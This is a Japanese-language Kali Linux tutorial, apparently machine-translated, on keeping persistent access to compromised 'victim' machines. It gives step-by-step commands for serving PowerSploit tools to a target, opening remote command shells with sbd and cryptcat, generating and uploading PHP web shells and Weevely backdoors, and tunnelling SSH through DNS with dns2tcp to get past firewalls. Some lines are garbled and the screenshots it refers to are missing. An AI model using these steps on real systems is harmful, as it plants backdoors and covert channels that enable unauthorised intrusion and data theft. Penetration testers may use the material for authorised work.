Kali-linux-maintaining-access
Kali Linux-アクセスの維持
この章では、Kaliが接続を維持し、ハッキングされたマシンが再び接続および切断された場合でも、ハッキングされたマシンへのアクセスに使用するツールについて説明します。
Powersploit
これは、Windowsマシン用のツールです。 被害者のマシンにPowerShellがインストールされています。 このツールは、ハッカーがPowerShellを介して被害者のマシンに接続するのに役立ちます。
それを開くには、左側の端末を開き、次のコマンドを入力してpowersploitフォルダーに入ります-
cd/usr/share/powersploit/
- 「ls」*と入力すると、アクセスして被害者のマシンにダウンロードしてインストールできるすべてのpowersploitツールがリストされます。 それらのほとんどは、名前に応じて自己説明された名前です。
被害者のマシンにこのツールをダウンロードする簡単な方法は、Webサーバーを作成することです。これにより、powersploitツールは次のコマンドを使用して簡単に作成できます-
python -m SimpleHTTPServer
この後、「http://<Kali machine ip_address>:8000/」と入力すると、次のようになります。
Sbd
sbdはNetcatに似たツールです。 移植性があり、LinuxおよびMicrosoftマシンで使用できます。 sbdはAES-CBC-128 + HMAC-SHA1暗号化を備えています>基本的に、特定のポートでいつでも被害者のマシンに接続し、リモートでコマンドを送信するのに役立ちます。
それを開くには、ターミナルに移動し、サーバーが接続を受け入れるように*“ sbd -l -p port” *と入力します。
この場合、サーバーがリッスンするポート44を配置します。
被害者のサイトで、*「sbd IPofserver port」*と入力します。 リモートコマンドを送信できる接続が確立されます。
この場合、同じマシンでテストを実行したため、「localhost」です。
最後に、サーバーで次のスクリーンショットに示すように接続が発生したことがわかります。
ウェブシェル
Webshellは、アクセスを維持したり、Webサイトをハッキングするために使用できます。 しかし、それらのほとんどはアンチウイルスによって検出されます。 C99 phpシェルは、ウイルス対策プログラムでよく知られています。 一般的なアンチウイルスは、マルウェアとして簡単に検出します。
通常、それらの主な機能は、Webインターフェイスを介してシステムコマンドを送信することです。
それを開き、ターミナルで _“ cd/usr/share/webshells/” _ と入力します。
ご覧のとおり、それらはプログラミング言語に応じてクラスに分割されています:asp、aspx、cfm、jsp、perl、php
PHPフォルダーに入力すると、PHP WebページのすべてのWebシェルを表示できます。
シェルをWebサーバーにアップロードするには、たとえば*“ simple-backdoor.php” *でWebページとWebシェルのURLを開きます。
最後に、cmdコマンドを作成します。 次のスクリーンショットのように、すべての情報が表示されます。
ウィーブリー
Weevelyは、telnetのような接続をシミュレートするPHP Webシェルです。 これは、悪用されたWebアプリケーション用のツールであり、ステルスバックドアとして、または正当なWebアカウントを管理するWebシェルとして使用できます。
開くには、ターミナルに移動して「weevely」と入力し、使用状況を確認します。
シェルを生成するには、*「weebly generate password pathoffile」*と入力します。 次のスクリーンショットに示すように、「デスクトップ」フォルダーに生成され、ファイルをWebサーバーにアップロードしてアクセスできるようにします。
次のスクリーンショットに示すようにWebシェルをアップロードした後、セッションが開始されたことを確認できるコマンド*「weevely URL password」*を使用して、cmdでサーバーに接続できます。
http-tunnel
http-tunnelは、HTTP要求でトンネリングされる双方向の仮想データストリームを作成します。 必要に応じて、HTTPプロキシ経由でリクエストを送信できます。 これは、制限されたファイアウォールの背後にいるユーザーに役立ちます。 HTTPプロキシを介したWWWアクセスが許可されている場合、http-tunnelとtelnetまたはPPPを使用してファイアウォールの外側のコンピューターに接続できます。
まず、次のコマンドでトンネルサーバーを作成する必要があります-
httptunnel_server –h
次に、クライアントサイトで*“ httptunnel_client –h” *と入力すると、両方が接続の受け入れを開始します。
dns2tcp
これも、UDP 53ポートを意味するDNSトラフィックを介してTCPトラフィックを渡すのに役立つトンネリングツールです。
開始するには、*“ dns2tcpd” *と入力します。 スクリプトを開くときに使用方法が説明されます。
サーバーサイトでこのコマンドを入力して、ファイルを構成します。
#cat >>.dns2tcpdrc
<&l;END listen = 0.0.0.0
port = 53 user=nobody
chroot =/root/dns2tcp
pid_file =/var/run/dns2tcp.pid
domain = your domain key = secretkey
resources = ssh:127.0.0.1:22
END
#dns2tcpd -f .dns2tcpdrc
クライアントサイトで、このコマンドを入力します。
# cat >>.dns2tcprc
<<END domain = your domain
resource = ssh
local_port = 7891
key = secretkey
END
# dns2tcpc -f .dns2tcprc
# ssh root@localhost -p 7891 -D 7076
このコマンドでトンネリングが開始されます。
クリプトキャット
これは、暗号化された方法で被害者のマシンとTCPおよびUDP接続を確立できるNetcatのような別のツールです。
サーバーを起動して接続をリッスンするには、次のコマンドを入力します-
cryptcat –l –p port –n
どこで、
- -l は接続を聞くことを意味します
- -p はポート番号パラメーターを表します
- -n は名前解決を行わないことを意味します
クライアントサイトでは、接続コマンドは*「cryptcat IPofServer PortofServer」*です